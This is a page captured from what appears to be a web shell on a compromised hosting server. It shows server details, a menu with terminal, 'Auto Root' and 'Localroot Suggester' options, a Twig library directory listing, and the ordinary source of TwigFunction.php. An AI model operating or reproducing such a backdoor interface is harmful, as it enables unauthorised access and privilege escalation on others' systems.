Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpguard /
app /
vendor /
twig /
twig /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Attribute
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Cache
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Error
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
ExpressionParser
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Extension
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Loader
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Node
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
NodeVisitor
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Profiler
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Resources
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Runtime
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
RuntimeLoader
[ DIR ]
drwxr-xr-x
2024-09-27 07:26
Sandbox
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Test
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
TokenParser
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
Util
[ DIR ]
drwxr-xr-x
2025-05-08 04:26
AbstractTwigCallable.php
5.36
KB
-rw-r--r--
2025-05-08 04:26
Compiler.php
6.17
KB
-rw-r--r--
2025-05-08 04:26
DeprecatedCallableInfo.php
1.64
KB
-rw-r--r--
2025-05-08 04:26
Environment.php
27.04
KB
-rw-r--r--
2025-05-08 04:26
ExpressionParser.php
12.32
KB
-rw-r--r--
2025-05-08 04:26
ExtensionSet.php
16.55
KB
-rw-r--r--
2025-05-08 04:26
FileExtensionEscapingStrategy.php
1.44
KB
-rw-r--r--
2025-05-08 04:26
Lexer.php
22.28
KB
-rw-r--r--
2025-05-08 04:26
Markup.php
1.03
KB
-rw-r--r--
2025-05-08 04:26
NodeTraverser.php
1.78
KB
-rw-r--r--
2024-09-27 07:26
OperatorPrecedenceChange.php
874
B
-rw-r--r--
2025-05-08 04:26
Parser.php
21.44
KB
-rw-r--r--
2025-05-08 04:26
Source.php
929
B
-rw-r--r--
2024-09-27 07:26
Template.php
16.03
KB
-rw-r--r--
2025-05-08 04:26
TemplateWrapper.php
2.56
KB
-rw-r--r--
2025-05-08 04:26
Token.php
7.75
KB
-rw-r--r--
2025-05-08 04:26
TokenStream.php
3.5
KB
-rw-r--r--
2025-05-08 04:26
TwigCallableInterface.php
1.17
KB
-rw-r--r--
2024-09-27 07:26
TwigFilter.php
1.84
KB
-rw-r--r--
2025-05-08 04:26
TwigFunction.php
1.58
KB
-rw-r--r--
2024-09-27 07:26
TwigTest.php
1.53
KB
-rw-r--r--
2024-09-27 07:26
Save
Rename
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig; use Twig\Node\Expression\FunctionExpression; use Twig\Node\Node; /** * Represents a template function. * * @author Fabien Potencier <fabien@symfony.com> * * @see https://twig.symfony.com/doc/templates.html#functions */ final class TwigFunction extends AbstractTwigCallable { /** * @param callable|array{class-string, string}|null $callable A callable implementing the function. If null, you need to overwrite the "node_class" option to customize compilation. */ public function __construct(string $name, $callable = null, array $options = []) { parent::__construct($name, $callable, $options); $this->options = array_merge([ 'is_safe' => null, 'is_safe_callback' => null, 'node_class' => FunctionExpression::class, 'parser_callable' => null, ], $this->options); } public function getType(): string { return 'function'; } public function getParserCallable(): ?callable { return $this->options['parser_callable']; } public function getSafe(Node $functionArgs): ?array { if (null !== $this->options['is_safe']) { return $this->options['is_safe']; } if (null !== $this->options['is_safe_callback']) { return $this->options['is_safe_callback']($functionArgs); } return []; } }